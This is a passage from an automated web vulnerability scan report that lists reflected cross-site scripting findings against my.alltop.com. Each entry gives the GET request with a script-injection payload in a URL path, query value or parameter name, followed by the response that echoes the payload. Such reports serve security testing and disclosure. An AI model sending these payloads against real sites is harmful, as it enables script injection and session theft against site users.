Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o?f90db"><script>alert(1)</script>15dbfcc41db=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.174. http://my.alltop.com/alpha/o [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1353"><script>alert(1)</script>b69c5171755 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017D)%3C/script%3Ed1353"><script>alert(1)</script>b69c5171755 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017D)%3C/script%3Ed1353"><script>alert(1)</script>b69c5171755" method="post" accept-charset="utf-8">
...[SNIP]...

1.175. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c6f"><script>alert(1)</script>ca4c78e55e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C28c6f"><script>alert(1)</script>ca4c78e55e/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C28c6f"><script>alert(1)</script>ca4c78e55e/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.176. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 890ea"><script>alert(1)</script>5524fab674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C890ea"><script>alert(1)</script>5524fab674/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C890ea"><script>alert(1)</script>5524fab674/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.177. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fe1"><script>alert(1)</script>a9f06099045 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C56fe1"><script>alert(1)</script>a9f06099045/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C56fe1"><script>alert(1)</script>a9f06099045/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.178. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b33"><script>alert(1)</script>c67305f2247 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E72b33"><script>alert(1)</script>c67305f2247 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E72b33"><script>alert(1)</script>c67305f2247" method="post" accept-charset="utf-8">
...[SNIP]...

1.179. http://my.alltop.com/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55719"><script>alert(1)</script>789ab6f2c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E?55719"><script>alert(1)</script>789ab6f2c47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CF)%3C/script%3E?55719"><script>alert(1)</script>789ab6f2c47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.180. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a8f"><script>alert(1)</script>02144306c7f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/oc1a8f"><script>alert(1)</script>02144306c7f/%22ns=%22netsparker(0x0001D1) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:55 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/oc1a8f"><script>alert(1)</script>02144306c7f/%22ns=%22netsparker(0x0001D1)" method="post" accept-charset="utf-8">
...[SNIP]...

1.181. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c44"><script>alert(1)</script>0d4a812929a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%22ns99c44"><script>alert(1)</script>0d4a812929a=%22netsparker(0x0001D1) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
